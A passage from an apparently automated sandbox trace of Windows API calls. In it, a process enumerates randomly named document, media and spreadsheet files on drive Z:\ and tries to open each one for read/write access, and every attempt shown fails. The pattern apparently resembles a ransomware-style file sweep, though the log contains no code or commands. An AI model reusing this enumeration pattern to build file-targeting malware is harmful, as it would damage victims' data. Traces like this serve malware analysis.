ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13ae1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ofYpMQKf1RjCMx.wav", cAlternateFileName="")) returned 1 [0181.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.641] PathFindExtensionW (pszPath="Z:\\ofYpMQKf1RjCMx.wav") returned=".wav" [0181.645] CreateFileW (lpFileName="Z:\\ofYpMQKf1RjCMx.wav" (normalized: "z:\\ofypmqkf1rjcmx.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.647] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xa9e7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="L1fyabptENWoGXu.rtf", cAlternateFileName="")) returned 1 [0181.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.647] PathFindExtensionW (pszPath="Z:\\L1fyabptENWoGXu.rtf") returned=".rtf" [0181.651] CreateFileW (lpFileName="Z:\\L1fyabptENWoGXu.rtf" (normalized: "z:\\l1fyabptenwogxu.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.652] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x12529, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hoPVmBvF77.odt", cAlternateFileName="")) returned 1 [0181.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.652] PathFindExtensionW (pszPath="Z:\\hoPVmBvF77.odt") returned=".odt" [0181.657] CreateFileW (lpFileName="Z:\\hoPVmBvF77.odt" (normalized: "z:\\hopvmbvf77.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.658] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xbc43, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="umVoob.csv", cAlternateFileName="")) returned 1 [0181.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0181.658] PathFindExtensionW (pszPath="Z:\\umVoob.csv") returned=".csv" [0181.662] CreateFileW (lpFileName="Z:\\umVoob.csv" (normalized: "z:\\umvoob.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0181.663] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x6596, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RyYcx2F2hgV.gif", cAlternateFileName="")) returned 1 [0181.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.663] PathFindExtensionW (pszPath="Z:\\RyYcx2F2hgV.gif") returned=".gif" [0181.667] CreateFileW (lpFileName="Z:\\RyYcx2F2hgV.gif" (normalized: "z:\\ryycx2f2hgv.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.669] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26563936, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd1ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AhwQOJysH9.jpg", cAlternateFileName="")) returned 1 [0181.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.669] PathFindExtensionW (pszPath="Z:\\AhwQOJysH9.jpg") returned=".jpg" [0181.673] CreateFileW (lpFileName="Z:\\AhwQOJysH9.jpg" (normalized: "z:\\ahwqojysh9.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.674] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x12975, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eQwKBctI5AfYjbVKmqeN.ods", cAlternateFileName="")) returned 1 [0181.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0181.674] PathFindExtensionW (pszPath="Z:\\eQwKBctI5AfYjbVKmqeN.ods") returned=".ods" [0181.678] CreateFileW (lpFileName="Z:\\eQwKBctI5AfYjbVKmqeN.ods" (normalized: "z:\\eqwkbcti5afyjbvkmqen.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0181.679] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xfd50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6R7qq9DkqNA3WVHMTs.doc", cAlternateFileName="")) returned 1 [0181.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0181.679] PathFindExtensionW (pszPath="Z:\\6R7qq9DkqNA3WVHMTs.doc") returned=".doc" [0181.683] CreateFileW (lpFileName="Z:\\6R7qq9DkqNA3WVHMTs.doc" (normalized: "z:\\6r7qq9dkqna3wvhmts.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0181.684] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11e85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KAk0a7xY4jTir.m4a", cAlternateFileName="")) returned 1 [0181.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.684] PathFindExtensionW (pszPath="Z:\\KAk0a7xY4jTir.m4a") returned=".m4a" [0181.688] CreateFileW (lpFileName="Z:\\KAk0a7xY4jTir.m4a" (normalized: "z:\\kak0a7xy4jtir.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.689] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x92e2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5n4Otxttbgfrkyd1Qv.mp3", cAlternateFileName="")) returned 1 [0181.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0181.689] PathFindExtensionW (pszPath="Z:\\5n4Otxttbgfrkyd1Qv.mp3") returned=".mp3" [0181.693] CreateFileW (lpFileName="Z:\\5n4Otxttbgfrkyd1Qv.mp3" (normalized: "z:\\5n4otxttbgfrkyd1qv.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0181.694] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1361c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZRruaCKjxo6i.ots", cAlternateFileName="")) returned 1 [0181.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.694] PathFindExtensionW (pszPath="Z:\\ZRruaCKjxo6i.ots") returned=".ots" [0181.698] CreateFileW (lpFileName="Z:\\ZRruaCKjxo6i.ots" (normalized: "z:\\zrruackjxo6i.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.699] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x91ff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oNmnCAGLhaZCfP.bmp", cAlternateFileName="")) returned 1 [0181.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.699] PathFindExtensionW (pszPath="Z:\\oNmnCAGLhaZCfP.bmp") returned=".bmp" [0181.703] CreateFileW (lpFileName="Z:\\oNmnCAGLhaZCfP.bmp" (normalized: "z:\\onmncaglhazcfp.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.704] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x155ac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B2EjwcG.xls", cAlternateFileName="")) returned 1 [0181.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0181.704] PathFindExtensionW (pszPath="Z:\\B2EjwcG.xls") returned=".xls" [0181.708] CreateFileW (lpFileName="Z:\\B2EjwcG.xls" (normalized: "z:\\b2ejwcg.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0181.709] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x5b63, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tcambCkECjq.ods", cAlternateFileName="")) returned 1 [0181.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.710] PathFindExtensionW (pszPath="Z:\\tcambCkECjq.ods") returned=".ods" [0181.714] CreateFileW (lpFileName="Z:\\tcambCkECjq.ods" (normalized: "z:\\tcambckecjq.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.715] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26546475, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11a0b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1WjGsbbxyz9w44lK.jpg", cAlternateFileName="")) returned 1 [0181.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.715] PathFindExtensionW (pszPath="Z:\\1WjGsbbxyz9w44lK.jpg") returned=".jpg" [0181.719] CreateFileW (lpFileName="Z:\\1WjGsbbxyz9w44lK.jpg" (normalized: "z:\\1wjgsbbxyz9w44lk.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.720] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xad00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="85sWKB.jpg", cAlternateFileName="")) returned 1 [0181.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0181.720] PathFindExtensionW (pszPath="Z:\\85sWKB.jpg") returned=".jpg" [0181.724] CreateFileW (lpFileName="Z:\\85sWKB.jpg" (normalized: "z:\\85swkb.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0181.725] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x15a5f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F01GLe.odt", cAlternateFileName="")) returned 1 [0181.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0181.725] PathFindExtensionW (pszPath="Z:\\F01GLe.odt") returned=".odt" [0181.728] CreateFileW (lpFileName="Z:\\F01GLe.odt" (normalized: "z:\\f01gle.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0181.729] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x10636, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7wJ29fsIwS36l.ods", cAlternateFileName="")) returned 1 [0181.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.729] PathFindExtensionW (pszPath="Z:\\7wJ29fsIwS36l.ods") returned=".ods" [0181.733] CreateFileW (lpFileName="Z:\\7wJ29fsIwS36l.ods" (normalized: "z:\\7wj29fsiws36l.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.734] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2667ec80, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x101cb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bv3be5Un8YJj.avi", cAlternateFileName="")) returned 1 [0181.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.734] PathFindExtensionW (pszPath="Z:\\bv3be5Un8YJj.avi") returned=".avi" [0181.737] CreateFileW (lpFileName="Z:\\bv3be5Un8YJj.avi" (normalized: "z:\\bv3be5un8yjj.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.738] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xc2ea, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LLAm0.pps", cAlternateFileName="")) returned 1 [0181.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0181.738] PathFindExtensionW (pszPath="Z:\\LLAm0.pps") returned=".pps" [0181.742] CreateFileW (lpFileName="Z:\\LLAm0.pps" (normalized: "z:\\llam0.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0181.743] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265c53b9, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xc9dc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NnhUiKm1fKnUDbh8LQYp.mp4", cAlternateFileName="")) returned 1 [0181.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0181.743] PathFindExtensionW (pszPath="Z:\\NnhUiKm1fKnUDbh8LQYp.mp4") returned=".mp4" [0181.747] CreateFileW (lpFileName="Z:\\NnhUiKm1fKnUDbh8LQYp.mp4" (normalized: "z:\\nnhuikm1fknudbh8lqyp.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0181.748] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1769e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EqQ64IKq2Th.pptx", cAlternateFileName="")) returned 1 [0181.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.748] PathFindExtensionW (pszPath="Z:\\EqQ64IKq2Th.pptx") returned=".pptx" [0181.752] CreateFileW (lpFileName="Z:\\EqQ64IKq2Th.pptx" (normalized: "z:\\eqq64ikq2th.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.753] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x111e1, dwReserved0=0xa0000003, dwReserved1=0x0, 